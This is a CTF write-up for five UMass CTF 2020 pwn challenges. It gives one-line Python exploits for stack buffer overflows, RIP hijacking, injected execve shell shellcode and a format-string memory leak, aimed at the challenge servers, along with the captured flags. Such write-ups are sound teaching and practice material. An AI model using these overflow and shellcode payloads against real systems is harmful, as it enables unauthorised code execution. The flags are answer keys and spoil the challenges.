UMass CTF 2020: PWN Engineering Writeups

Introduction

This page details my pwn writeups for The University of Massachusetts Amherst CTF. This CTF was originally just an internal CTF but I knew one of the moderators Sam. Overall it was a great CTF and I really enjoyed it; they definitely had some unique challenges.

All my scripts and the provided files from the CTF can be found here.

Baby Overflow I

Prompt

This is my first program. Be nice :)

nc 34.75.105.136 1024

TLDR;

Looking at the binary in GDB we see that the buffer is 16 characters and right above it is the variable for should_get_flag. Therefore, we should write in 16 junk characters and then write in 0x1.

python -c "import struct; out = 'A'*0x10; out += struct.pack('I', 0x1); print(out)" | nc 34.75.105.136 1024

Flag

UMASS{N3v3r_g0nn4_m3s$_th1s_up}

Baby Overflow II

Prompt

When my friend Ptasie Mleczko typed in his name, it gave him the flag. It was weird, but I think I fixed it.

nc 34.75.105.136 1025

TLDR;

The binary is pretty much the same, however, this time it expects a specific value instead of a boolean True value.

python -c "import struct;out = 'A'*0x10;out += struct.pack('I', 0xB16B00B5);print(out)" | nc 34.75.105.136 1025

Flag

UMASS{Dyslexic_D0g_1nth3$ky}

Baby Overflow III

Prompt

Okay, now it’s really secure.

nc 34.75.105.136 1027

TLDR;

For this challenge one has to gain control of the RIP to change execution flow. This can be done by overloading the buffer, the saved RBP value on the stack and then by inserting the address one would like to execute at.

(python -c "import struct;out = 'A'*0x10;out += 'bbbbbbbb';out += struct.pack('Q', 0x401132); out += struct.pack('Q', 0x401060); print(out)"; echo) | nc 34.75.105.136 1027

Flag

UMASS{first_step_to_rop}

Baby Overflow IV

Prompt

I don’t even know why I had that function in the first place…

nc 34.75.105.136 1028

TLDR;

(python -c "import struct;out = 'A'*0x10;out += 'bbbbbbbb';out += struct.pack('Q', 0x0000000000404060); print('\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05');print(out)"; cat -) | nc 34.75.105.136 1028

Once in the shell type cat flag

Flag

UMASS{now_you_can_really_call_yourself_a_hacker}

format_what

Prompt

We just learned format strings in 230, can you check if I’m doing it right?

nc 34.75.105.136 1030

TLDR;

python -c "print('%lu '*20)" | nc 34.75.105.136 1030 | (read -r i; read -r s; for i in $s; do python3 -c "import struct; print(struct.pack('Q', $i))"; done)

Flag

UMASS{n0_f0rm4t_n33d3d!?}